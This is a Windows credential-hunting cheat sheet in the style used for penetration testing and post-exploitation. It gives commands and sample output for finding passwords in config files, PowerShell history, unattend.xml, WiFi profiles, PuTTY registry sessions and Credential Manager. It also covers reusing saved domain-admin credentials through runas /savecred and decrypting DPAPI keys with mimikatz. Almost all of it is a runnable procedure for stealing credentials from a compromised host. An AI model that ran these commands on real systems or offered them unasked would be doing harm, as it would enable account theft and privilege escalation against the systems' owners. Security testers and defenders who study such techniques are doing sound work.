CREDENTIAL HUNTING

Search for passwords in files

Grep for password strings — Config files, notes, scripts

findstr /si "password" *.txt *.xml *.ini *.config *.cfg
findstr /si "password" C:\Users\*.*
Example Output
findstr /si "password" *.txt *.xml *.config
C:\inetpub\wwwroot\web.config:  connectionString="...Password=DBp@ss123..."
C:\Users\admin\Desktop\notes.txt: WiFi password: CompanyWifi2024!

PowerShell history

Previous PS commands — May contain typed passwords

type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Example Output
type ConsoleHost_history.txt
Invoke-Command -ComputerName DC01 -Credential $cred
$password = ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText
net user admin NewP@ss123 /domain
(Passwords in PS history)

IIS web.config

Database connection strings — SQL credentials

type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Example Output
type C:\inetpub\wwwroot\web.config
<connectionStrings>
  <add connectionString="Server=localhost;Database=webapp;User Id=sa;Password=SQLp@ss2024!"/>
</connectionStrings>

Unattend/sysprep files

Deployment passwords — Often base64 encoded

type C:\unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\system32\sysprep\Unattend.xml
Example Output
type C:\Windows\Panther\Unattend.xml
<AutoLogon>
  <Password>
    <Value>QWRtaW5AMTIz</Value>
  </Password>
  <Username>Administrator</Username>
</AutoLogon>

base64 -d: Admin@123

WiFi passwords

Stored WiFi credentials — May match user passwords

netsh wlan show profiles
netsh wlan show profile name=<SSID> key=clear
Example Output
netsh wlan show profiles
  All User Profile : CorpWiFi

netsh wlan show profile name=CorpWiFi key=clear
  Key Content: CompanyWiFi2024!
(People often reuse WiFi password for accounts)

PuTTY saved sessions

Stored SSH credentials — Proxy passwords

reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s
Example Output
reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s
  HostName: 172.16.1.10
  UserName: admin
  ProxyPassword: Pr0xyP@ss!
(Saved SSH session credentials)

Credential Manager

Windows Credential Manager — Stored creds for services

cmdkey /list
rundll32.exe keymgr.dll,KRShowKeyMgr
Example Output
cmdkey /list
Target: Domain:interactive=CORP\administrator
Type: Domain Password
User: CORP\administrator
(Saved domain admin creds! Use with runas /savecred)

DPAPI master keys

Encrypted credential storage — Decrypt with mimikatz if admin

dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Example Output
dir C:\Users\admin\AppData\Roaming\Microsoft\Protect\
  S-1-5-21-...
  (Master key files found)

With admin access:
mimikatz# dpapi::masterkey /in:masterkey /rpc
(Decrypt Chrome passwords, saved creds)